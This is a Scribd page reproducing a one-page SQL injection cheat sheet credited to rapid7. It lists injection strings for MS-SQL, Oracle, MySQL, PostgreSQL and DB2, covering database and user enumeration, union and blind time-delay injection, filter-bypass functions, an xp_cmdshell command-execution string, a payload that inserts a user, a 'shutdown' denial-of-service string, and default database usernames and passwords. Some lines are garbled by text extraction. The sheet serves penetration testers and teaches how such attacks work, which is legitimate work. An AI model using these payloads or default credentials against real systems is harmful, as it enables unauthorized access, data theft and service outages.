KEMBAR78
SQL Injection Commands Guide | PDF
0% found this document useful (0 votes)
483 views1 page

SQL Injection Commands Guide

This document provides a cheat sheet of common SQL injection commands that can be used to discover information about backend databases and perform SQL injection attacks. It includes commands to find the database version, list users, view tables and columns, determine the current user, and more for various database types including MS SQL, Oracle, MySQL, PostgreSQL, and IBM DB2. Default usernames and passwords are also listed that are commonly used for accessing databases.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
483 views1 page

SQL Injection Commands Guide

This document provides a cheat sheet of common SQL injection commands that can be used to discover information about backend databases and perform SQL injection attacks. It includes commands to find the database version, list users, view tables and columns, determine the current user, and more for various database types including MS SQL, Oracle, MySQL, PostgreSQL, and IBM DB2. Default usernames and passwords are also listed that are commonly used for accessing databases.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

SQL INJECTION CHEAT SHEET

www.rapid7.com

Common SQL Injection Commands for Backend Databases


MS-SQL
Grab version

@@version

Users

name FROM master..syslogins

SQL Injection Discovery

Tables

name FROM master..sysobjects WHERE xtype = U

Common SQL Injection Attack Strings

Database

name FROM master..sysdatabases;

Columns

name FROM syscolumns WHERE id = (SELECT id


FROM sysobjects WHERE name = <TABLENAME)
DB_NAME()

Query syntax breaking

Single Quote(), Double Quote()

Injection SQL comment

Hyphens (--), Hash(#), Comment(/*)

Extending/Appending queries

Semicolon (;)

Running User

Injecting/Bypassing filters

CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL

Oracle

Common SQL Injection Commands

Grab version

table v$version compare with Oracle%

Users

* from dba_users

Injecting Union

Union all select NULL (Multiple columns)

Tables

table_name from all_tables

Running Command

1;exec master..xp_cmdshell dir>C:\inetpub\wwwroot\dir.txt OR master.dbo.xp_cmdshell

Database

distinct owner from all_tables

Columns

column_name from all_tab_columns where table_


name=<TABLENAME>

Running User

user from dual

Loading Files

LOAD_FILE(), User UTL_FILE and utfReadfileAsTable

Adding user

1; insert into users values(nto,nto123)

DoS

1;shutdown

Fetching Fields

select name from syscolumns where id =(select


id FROM sysobjects where name = target table
name) (Union can help)Co

Common Blind SQL Injection Commands

IBM DB2
Grab version

Versionnumber from sysibm.sysversions;

Users

user from sysibm.sysdummy1

Tables

name from sysibm.systables

Database

schemaname from syscat.schemata

Quick Check

AND 1=1, AND 1=0

Columns

name, tbname, coltype from sysibm.syscolumns

User Check

1+AND+USER_NAME()=dbo

Running User

user from sysibm.sysdummy1

Injecting Wait

1;waitfor+delay+0:0:10

MySQL

Check for sa

SELECT+ASCII(SUBSTRING((a.
loginame),1,1))+FROM+master..
sysprocesses+AS+a+WHERE+a.spid+=+@@
SPID)=115

Grab version

@@version

Users

* from mysql.user

Tables

table_schema,table_name FROM information_


schema.tables WHERE table_schema != mysql
AND table_schema != information_schema

Database

distinct(db) FROM mysql.db

Columns

table_schema, column_name FROM information_


schema.columns WHERE table_schema != mysql
AND table_schema != information_schema AND
table_name == <TABLENAME>

Running User

user()

Looping/Sleep

BENCHMARK(TIMES, TASK), pg_sleep(10)

Default Usernames/Passwords
Oracle

scott/tiger, dbsnmp/dbsnmp

MySQL

mysql/<BLANK>, root/<BLANK>

PostgreSQL

postgres/<BLANK>

MS-SQL

sa/<BLANK>

DB2

db2admin/db2admin

PostgreSQL
Grab version

version()

Users

* from pg_user

Database

datname FROM pg_database

Running User

user;

You might also like